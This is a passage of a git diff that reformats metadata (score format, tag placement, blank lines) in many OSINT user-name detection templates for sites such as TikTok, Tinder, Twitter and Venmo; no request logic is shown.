cwe-id: CWE-200 - tags: osint,osint-art,themeforest metadata: max-request: 1 + tags: osint,osint-art,themeforest self-contained: true + http: - method: GET path: diff --git a/http/osint/thetattooforum.yaml b/http/osint/thetattooforum.yaml index f4712acb98..f1b5b5ce27 100644 --- a/http/osint/thetattooforum.yaml +++ b/http/osint/thetattooforum.yaml @@ -3,17 +3,18 @@ id: thetattooforum info: name: Thetattooforum User Name Information - Detect author: dwisiswant0 - description: Thetattooforum user name information check was conducted. severity: info + description: Thetattooforum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,thetattooforum metadata: max-request: 1 + tags: osint,osint-art,thetattooforum self-contained: true + http: - method: GET path: diff --git a/http/osint/threads.yaml b/http/osint/threads.yaml index fd226eb2c5..b8564a458c 100644 --- a/http/osint/threads.yaml +++ b/http/osint/threads.yaml @@ -3,18 +3,19 @@ id: threads info: name: Threads User Name Information - Detect author: olearycrew - description: Threads user name information check was conducted. severity: info + description: Threads user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: osint,osint-social,threads self-contained: true + http: - method: GET path: diff --git a/http/osint/tiktok.yaml b/http/osint/tiktok.yaml index 2a8ad98078..67f41f8018 100644 --- a/http/osint/tiktok.yaml +++ b/http/osint/tiktok.yaml @@ -3,17 +3,18 @@ id: tiktok info: name: TikTok User Name Information - Detect author: dwisiswant0 - description: TikTok user name information check was conducted. severity: info + description: TikTok user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tiktok metadata: max-request: 1 + tags: osint,osint-social,tiktok self-contained: true + http: - method: GET path: diff --git a/http/osint/tildezone-mastodon-instance.yaml b/http/osint/tildezone-mastodon-instance.yaml index 78905cce94..c187e62438 100644 --- a/http/osint/tildezone-mastodon-instance.yaml +++ b/http/osint/tildezone-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: tildezone-mastodon-instance info: name: Tilde.zone (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Tilde.zone (Mastodon Instance) user name information check was conducted. severity: info + description: Tilde.zone (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tildezone-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,tildezone-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/tinder.yaml b/http/osint/tinder.yaml index abfe09dff2..a4c205ce63 100644 --- a/http/osint/tinder.yaml +++ b/http/osint/tinder.yaml @@ -3,17 +3,18 @@ id: tinder info: name: Tinder User Name Information - Detect author: dwisiswant0 - description: Tinder user name information check was conducted. severity: info + description: Tinder user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,tinder metadata: max-request: 1 + tags: osint,osint-dating,tinder self-contained: true + http: - method: GET path: diff --git a/http/osint/tmdb.yaml b/http/osint/tmdb.yaml index 0faafc8e25..f761031d18 100644 --- a/http/osint/tmdb.yaml +++ b/http/osint/tmdb.yaml @@ -7,13 +7,14 @@ info: description: TMDB user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tmdb metadata: max-request: 1 + tags: osint,osint-social,tmdb self-contained: true + http: - method: GET path: diff --git a/http/osint/tootingch-mastodon-instance.yaml b/http/osint/tootingch-mastodon-instance.yaml index 020dd7aa9f..088aadea00 100644 --- a/http/osint/tootingch-mastodon-instance.yaml +++ b/http/osint/tootingch-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: tootingch-mastodon-instance info: name: Tooting.ch (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Tooting.ch (Mastodon Instance) user name information check was conducted. severity: info + description: Tooting.ch (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tootingch-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,tootingch-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/totalwar.yaml b/http/osint/totalwar.yaml index 3202e3c340..7f0b77be1c 100644 --- a/http/osint/totalwar.yaml +++ b/http/osint/totalwar.yaml @@ -3,17 +3,18 @@ id: totalwar info: name: TotalWar User Name Information - Detect author: dwisiswant0 - description: TotalWar user name information check was conducted. severity: info + description: TotalWar user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,totalwar metadata: max-request: 1 + tags: osint,osint-gaming,totalwar self-contained: true + http: - method: GET path: diff --git a/http/osint/toyhouse.yaml b/http/osint/toyhouse.yaml index 29022d9e65..3eb5a084b0 100644 --- a/http/osint/toyhouse.yaml +++ b/http/osint/toyhouse.yaml @@ -3,17 +3,18 @@ id: toyhouse info: name: Toyhou.se User Name Information - Detect author: dwisiswant0 - description: Toyhou.se user name information check was conducted. severity: info + description: Toyhou.se user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,toyhouse metadata: max-request: 1 + tags: osint,osint-hobby,toyhouse self-contained: true + http: - method: GET path: diff --git a/http/osint/trackmanialadder.yaml b/http/osint/trackmanialadder.yaml index bbc1921ea4..097e3b4193 100644 --- a/http/osint/trackmanialadder.yaml +++ b/http/osint/trackmanialadder.yaml @@ -3,17 +3,18 @@ id: trackmanialadder info: name: TrackmaniaLadder User Name Information - Detect author: dwisiswant0 - description: TrackmaniaLadder user name information check was conducted. severity: info + description: TrackmaniaLadder user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,trackmanialadder metadata: max-request: 1 + tags: osint,osint-gaming,trackmanialadder self-contained: true + http: - method: GET path: diff --git a/http/osint/tradingview.yaml b/http/osint/tradingview.yaml index f5216619a3..03600058f6 100644 --- a/http/osint/tradingview.yaml +++ b/http/osint/tradingview.yaml @@ -3,17 +3,18 @@ id: tradingview info: name: Tradingview User Name Information - Detect author: dwisiswant0 - description: Tradingview user name information check was conducted. severity: info + description: Tradingview user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,tradingview metadata: max-request: 1 + tags: osint,osint-finance,tradingview self-contained: true + http: - method: GET path: diff --git a/http/osint/trakt.yaml b/http/osint/trakt.yaml index f851f9b5f5..936b102e33 100644 --- a/http/osint/trakt.yaml +++ b/http/osint/trakt.yaml @@ -3,17 +3,18 @@ id: trakt info: name: Trakt User Name Information - Detect author: dwisiswant0 - description: Trakt user name information check was conducted. severity: info + description: Trakt user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,trakt metadata: max-request: 1 + tags: osint,osint-video,trakt self-contained: true + http: - method: GET path: diff --git a/http/osint/trello.yaml b/http/osint/trello.yaml index dc6ebae8d7..cf9681945c 100644 --- a/http/osint/trello.yaml +++ b/http/osint/trello.yaml @@ -3,17 +3,18 @@ id: trello info: name: Trello User Name Information - Detect author: dwisiswant0 - description: Trello user name information check was conducted. severity: info + description: Trello user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,trello metadata: max-request: 1 + tags: osint,osint-social,trello self-contained: true + http: - method: GET path: diff --git a/http/osint/tripadvisor.yaml b/http/osint/tripadvisor.yaml index e2c3a04816..1cce44602c 100644 --- a/http/osint/tripadvisor.yaml +++ b/http/osint/tripadvisor.yaml @@ -3,17 +3,18 @@ id: tripadvisor info: name: Tripadvisor User Name Information - Detect author: dwisiswant0 - description: Tripadvisor user name information check was conducted. severity: info + description: Tripadvisor user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tripadvisor metadata: max-request: 1 + tags: osint,osint-social,tripadvisor self-contained: true + http: - method: GET path: diff --git a/http/osint/truth-social.yaml b/http/osint/truth-social.yaml index 15e522412c..1a0722458f 100644 --- a/http/osint/truth-social.yaml +++ b/http/osint/truth-social.yaml @@ -3,17 +3,18 @@ id: truth-social info: name: Truth Social User Name Information - Detect author: dwisiswant0 - description: Truth Social user name information check was conducted. severity: info + description: Truth Social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,truth-social metadata: max-request: 1 + tags: osint,osint-social,truth-social self-contained: true + http: - method: GET path: diff --git a/http/osint/tryhackme.yaml b/http/osint/tryhackme.yaml index 55804da210..fbddd29a5a 100644 --- a/http/osint/tryhackme.yaml +++ b/http/osint/tryhackme.yaml @@ -7,13 +7,14 @@ info: description: TryHackMe user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,tryhackme metadata: max-request: 1 + tags: osint,osint-social,tryhackme self-contained: true + http: - method: GET path: diff --git a/http/osint/tumblr.yaml b/http/osint/tumblr.yaml index b8a182526e..1e8ed2a8bd 100644 --- a/http/osint/tumblr.yaml +++ b/http/osint/tumblr.yaml @@ -3,17 +3,18 @@ id: tumblr info: name: Tumblr User Name Information - Detect author: dwisiswant0 - description: Tumblr user name information check was conducted. severity: info + description: Tumblr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,tumblr metadata: max-request: 1 + tags: osint,osint-images,tumblr self-contained: true + http: - method: GET path: diff --git a/http/osint/tunefind.yaml b/http/osint/tunefind.yaml index 5a2afb12ba..dadac3c029 100644 --- a/http/osint/tunefind.yaml +++ b/http/osint/tunefind.yaml @@ -3,17 +3,18 @@ id: tunefind info: name: Tunefind User Name Information - Detect author: dwisiswant0 - description: Tunefind user name information check was conducted. severity: info + description: Tunefind user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,tunefind metadata: max-request: 1 + tags: osint,osint-music,tunefind self-contained: true + http: - method: GET path: diff --git a/http/osint/twitcasting.yaml b/http/osint/twitcasting.yaml index be0ddbd7b9..a3f4646205 100644 --- a/http/osint/twitcasting.yaml +++ b/http/osint/twitcasting.yaml @@ -3,17 +3,18 @@ id: twitcasting info: name: Twitcasting User Name Information - Detect author: dwisiswant0 - description: Twitcasting user name information check was conducted. severity: info + description: Twitcasting user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,twitcasting metadata: max-request: 1 + tags: osint,osint-social,twitcasting self-contained: true + http: - method: GET path: diff --git a/http/osint/twitch.yaml b/http/osint/twitch.yaml index ff81dccf55..0b8dd38540 100644 --- a/http/osint/twitch.yaml +++ b/http/osint/twitch.yaml @@ -3,17 +3,18 @@ id: twitch info: name: Twitch User Name Information - Detect author: dwisiswant0 - description: Twitch user name information check was conducted. severity: info + description: Twitch user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,twitch metadata: max-request: 1 + tags: osint,osint-gaming,twitch self-contained: true + http: - method: GET path: diff --git a/http/osint/twitter-archived-profile.yaml b/http/osint/twitter-archived-profile.yaml index b120ba10ae..652c228ec8 100644 --- a/http/osint/twitter-archived-profile.yaml +++ b/http/osint/twitter-archived-profile.yaml @@ -3,17 +3,18 @@ id: twitter-archived-profile info: name: Twitter archived profile User Name Information - Detect author: dwisiswant0 - description: Twitter archived profile user name information check was conducted. severity: info + description: Twitter archived profile user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-archived,twitter-archived-profile metadata: max-request: 1 + tags: osint,osint-archived,twitter-archived-profile self-contained: true + http: - method: GET path: diff --git a/http/osint/twitter-archived-tweets.yaml b/http/osint/twitter-archived-tweets.yaml index 54f1592383..fd2da1642e 100644 --- a/http/osint/twitter-archived-tweets.yaml +++ b/http/osint/twitter-archived-tweets.yaml @@ -3,17 +3,18 @@ id: twitter-archived-tweets info: name: Twitter archived tweets User Name Information - Detect author: dwisiswant0 - description: Twitter archived tweets user name information check was conducted. severity: info + description: Twitter archived tweets user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-archived,twitter-archived-tweets metadata: max-request: 1 + tags: osint,osint-archived,twitter-archived-tweets self-contained: true + http: - method: GET path: diff --git a/http/osint/twitter.yaml b/http/osint/twitter.yaml index a03458b3e1..336752d476 100644 --- a/http/osint/twitter.yaml +++ b/http/osint/twitter.yaml @@ -3,17 +3,18 @@ id: twitter info: name: Twitter User Name Information - Detect author: dwisiswant0 - description: Twitter user name information check was conducted. severity: info + description: Twitter user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,twitter metadata: max-request: 1 + tags: osint,osint-social,twitter self-contained: true + http: - method: GET path: diff --git a/http/osint/twpro.yaml b/http/osint/twpro.yaml index 928f0d4225..a05da104e8 100644 --- a/http/osint/twpro.yaml +++ b/http/osint/twpro.yaml @@ -3,17 +3,18 @@ id: twpro info: name: Twpro User Name Information - Detect author: dwisiswant0 - description: Twpro user name information check was conducted. severity: info + description: Twpro user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,twpro metadata: max-request: 1 + tags: osint,osint-social,twpro self-contained: true + http: - method: GET path: diff --git a/http/osint/ubisoft.yaml b/http/osint/ubisoft.yaml index 674f3b4794..c481c6ea89 100644 --- a/http/osint/ubisoft.yaml +++ b/http/osint/ubisoft.yaml @@ -3,17 +3,18 @@ id: ubisoft info: name: Ubisoft User Name Information - Detect author: dwisiswant0 - description: Ubisoft user name information check was conducted. severity: info + description: Ubisoft user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,ubisoft metadata: max-request: 1 + tags: osint,osint-gaming,ubisoft self-contained: true + http: - method: GET path: diff --git a/http/osint/udemy.yaml b/http/osint/udemy.yaml index 325693c57c..7df752666e 100644 --- a/http/osint/udemy.yaml +++ b/http/osint/udemy.yaml @@ -3,17 +3,18 @@ id: udemy info: name: Udemy User Name Information - Detect author: dwisiswant0 - description: Udemy user name information check was conducted. severity: info + description: Udemy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,udemy metadata: max-request: 1 + tags: osint,osint-tech,udemy self-contained: true + http: - method: GET path: diff --git a/http/osint/uefconnect.yaml b/http/osint/uefconnect.yaml index fd477f0419..d2cbe42808 100644 --- a/http/osint/uefconnect.yaml +++ b/http/osint/uefconnect.yaml @@ -3,17 +3,18 @@ id: uefconnect info: name: Uefconnect User Name Information - Detect author: dwisiswant0 - description: Uefconnect user name information check was conducted. severity: info + description: Uefconnect user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,uefconnect metadata: max-request: 1 + tags: osint,osint-business,uefconnect self-contained: true + http: - method: GET path: diff --git a/http/osint/uid.yaml b/http/osint/uid.yaml index 617df099f0..bbea9e45ac 100644 --- a/http/osint/uid.yaml +++ b/http/osint/uid.yaml @@ -3,17 +3,18 @@ id: uid info: name: Uid User Name Information - Detect author: dwisiswant0 - description: Uid user name information check was conducted. severity: info + description: Uid user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,uid metadata: max-request: 1 + tags: osint,osint-social,uid self-contained: true + http: - method: GET path: diff --git a/http/osint/uiuxdevsocial-mastodon-instance.yaml b/http/osint/uiuxdevsocial-mastodon-instance.yaml index 5c1feb922b..e324c8a4c8 100644 --- a/http/osint/uiuxdevsocial-mastodon-instance.yaml +++ b/http/osint/uiuxdevsocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: uiuxdevsocial-mastodon-instance info: name: Uiuxdev.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Uiuxdev.social (Mastodon Instance) user name information check was conducted. severity: info + description: Uiuxdev.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,uiuxdevsocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,uiuxdevsocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/ultras-diary.yaml b/http/osint/ultras-diary.yaml index 98dc8d87b3..988fd6c7d3 100644 --- a/http/osint/ultras-diary.yaml +++ b/http/osint/ultras-diary.yaml @@ -3,17 +3,18 @@ id: ultras-diary info: name: Ultras Diary User Name Information - Detect author: dwisiswant0 - description: Ultras Diary user name information check was conducted. severity: info + description: Ultras Diary user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,ultras-diary metadata: max-request: 1 + tags: osint,osint-hobby,ultras-diary self-contained: true + http: - method: GET path: diff --git a/http/osint/ulubpl.yaml b/http/osint/ulubpl.yaml index edbece3bc9..eb1bd57ec7 100644 --- a/http/osint/ulubpl.yaml +++ b/http/osint/ulubpl.yaml @@ -3,17 +3,18 @@ id: ulubpl info: name: Ulub.pl User Name Information - Detect author: dwisiswant0 - description: Ulub.pl user name information check was conducted. severity: info + description: Ulub.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,ulubpl metadata: max-request: 1 + tags: osint,osint-misc,ulubpl self-contained: true + http: - method: GET path: diff --git a/http/osint/unsplash.yaml b/http/osint/unsplash.yaml index 667b676176..c77a3b3804 100644 --- a/http/osint/unsplash.yaml +++ b/http/osint/unsplash.yaml @@ -3,17 +3,18 @@ id: unsplash info: name: Unsplash User Name Information - Detect author: dwisiswant0 - description: Unsplash user name information check was conducted. severity: info + description: Unsplash user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,unsplash metadata: max-request: 1 + tags: osint,osint-images,unsplash self-contained: true + http: - method: GET path: diff --git a/http/osint/untappd.yaml b/http/osint/untappd.yaml index a9313b5501..dbe12a8186 100644 --- a/http/osint/untappd.yaml +++ b/http/osint/untappd.yaml @@ -3,17 +3,18 @@ id: untappd info: name: Untappd User Name Information - Detect author: dwisiswant0 - description: Untappd user name information check was conducted. severity: info + description: Untappd user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,untappd metadata: max-request: 1 + tags: osint,osint-social,untappd self-contained: true + http: - method: GET path: diff --git a/http/osint/usa-life.yaml b/http/osint/usa-life.yaml index c49cc17fbc..2a330e90f5 100644 --- a/http/osint/usa-life.yaml +++ b/http/osint/usa-life.yaml @@ -3,17 +3,18 @@ id: usa-life info: name: USA Life User Name Information - Detect author: dwisiswant0 - description: USA Life user name information check was conducted. severity: info + description: USA Life user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,usa-life metadata: max-request: 1 + tags: osint,osint-social,usa-life self-contained: true + http: - method: GET path: diff --git a/http/osint/utipio.yaml b/http/osint/utipio.yaml index 0c1cf89c92..0fc3f2c3d9 100644 --- a/http/osint/utipio.yaml +++ b/http/osint/utipio.yaml @@ -3,17 +3,18 @@ id: utipio info: name: Utip.io User Name Information - Detect author: dwisiswant0 - description: Utip.io user name information check was conducted. severity: info + description: Utip.io user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,utipio metadata: max-request: 1 + tags: osint,osint-finance,utipio self-contained: true + http: - method: GET path: diff --git a/http/osint/uwuai.yaml b/http/osint/uwuai.yaml index 1b3c6904ca..ba434b22e4 100644 --- a/http/osint/uwuai.yaml +++ b/http/osint/uwuai.yaml @@ -3,17 +3,18 @@ id: uwuai info: name: Uwu.ai User Name Information - Detect author: dwisiswant0 - description: Uwu.ai user name information check was conducted. severity: info + description: Uwu.ai user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,uwuai metadata: max-request: 1 + tags: osint,osint-social,uwuai self-contained: true + http: - method: GET path: diff --git a/http/osint/uwumarket.yaml b/http/osint/uwumarket.yaml index d36f564899..1d08eb01c4 100644 --- a/http/osint/uwumarket.yaml +++ b/http/osint/uwumarket.yaml @@ -3,17 +3,18 @@ id: uwumarket info: name: Uwumarket User Name Information - Detect author: dwisiswant0 - description: Uwumarket user name information check was conducted. severity: info + description: Uwumarket user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,uwumarket metadata: max-request: 1 + tags: osint,osint-business,uwumarket self-contained: true + http: - method: GET path: diff --git a/http/osint/vampr.yaml b/http/osint/vampr.yaml index 5c2dee4e4a..6263bad27a 100644 --- a/http/osint/vampr.yaml +++ b/http/osint/vampr.yaml @@ -8,7 +8,7 @@ info: Vampr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/osint/venmo.yaml b/http/osint/venmo.yaml index a9d456aeb5..0ed99f9b87 100644 --- a/http/osint/venmo.yaml +++ b/http/osint/venmo.yaml @@ -3,17 +3,18 @@ id: venmo info: name: Venmo User Name Information - Detect author: dwisiswant0 - description: Venmo user name information check was conducted. severity: info + description: Venmo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,venmo metadata: max-request: 1 + tags: osint,osint-finance,venmo self-contained: true + http: - method: GET path: diff --git a/http/osint/vero.yaml b/http/osint/vero.yaml index fbeb8aaa1b..197fa3150a 100644 --- a/http/osint/vero.yaml +++ b/http/osint/vero.yaml @@ -3,17 +3,18 @@ id: vero info: name: Vero User Name Information - Detect author: dwisiswant0 - description: Vero user name information check was conducted. severity: info + description: Vero user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,vero metadata: max-request: 1 + tags: osint,osint-art,vero self-contained: true + http: - method: GET path: diff --git a/http/osint/vibilagare.yaml b/http/osint/vibilagare.yaml index fb797ca70a..3408f2ee0b 100644 --- a/http/osint/vibilagare.yaml +++ b/http/osint/vibilagare.yaml @@ -3,17 +3,18 @@ id: vibilagare info: name: Vibilagare User Name Information - Detect author: dwisiswant0 - description: Vibilagare user name information check was conducted. severity: info + description: Vibilagare user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,vibilagare metadata: max-request: 1 + tags: osint,osint-misc,vibilagare self-contained: true + http: - method: GET path: diff --git a/http/osint/viddler.yaml b/http/osint/viddler.yaml index c694fa80e2..ee8059fb99 100644 --- a/http/osint/viddler.yaml +++ b/http/osint/viddler.yaml @@ -3,17 +3,18 @@ id: viddler info: name: Viddler User Name Information - Detect author: dwisiswant0 - description: Viddler user name information check was conducted. severity: info + description: Viddler user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,viddler metadata: max-request: 1 + tags: osint,osint-video,viddler self-contained: true + http: - method: GET path: diff --git a/http/osint/vimeo.yaml b/http/osint/vimeo.yaml index b6387c00e2..f2e6da029b 100644 --- a/http/osint/vimeo.yaml +++ b/http/osint/vimeo.yaml @@ -3,17 +3,18 @@ id: vimeo info: name: Vimeo User Name Information - Detect author: dwisiswant0 - description: Vimeo user name information check was conducted. severity: info + description: Vimeo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,vimeo metadata: max-request: 1 + tags: osint,osint-video,vimeo self-contained: true + http: - method: GET path: diff --git a/http/osint/vine.yaml b/http/osint/vine.yaml index bba5246d7c..4163181d3f 100644 --- a/http/osint/vine.yaml +++ b/http/osint/vine.yaml @@ -3,17 +3,18 @@ id: vine info: name: Vine User Name Information - Detect author: dwisiswant0 - description: Vine user name information check was conducted. severity: info + description: Vine user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,vine metadata: max-request: 1 + tags: osint,osint-video,vine self-contained: true + http: - method: GET path: diff --git a/http/osint/vip-blog.yaml b/http/osint/vip-blog.yaml index 36a62b050f..e58b457ea5 100644 --- a/http/osint/vip-blog.yaml +++ b/http/osint/vip-blog.yaml @@ -3,17 +3,18 @@ id: vip-blog info: name: VIP-blog User Name Information - Detect author: dwisiswant0 - description: VIP-blog user name information check was conducted. severity: info + description: VIP-blog user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,vip-blog metadata: max-request: 1 + tags: osint,osint-blog,vip-blog self-contained: true + http: - method: GET path: diff --git a/http/osint/virustotal.yaml b/http/osint/virustotal.yaml index e6d2a1d4aa..dd2cc72875 100644 --- 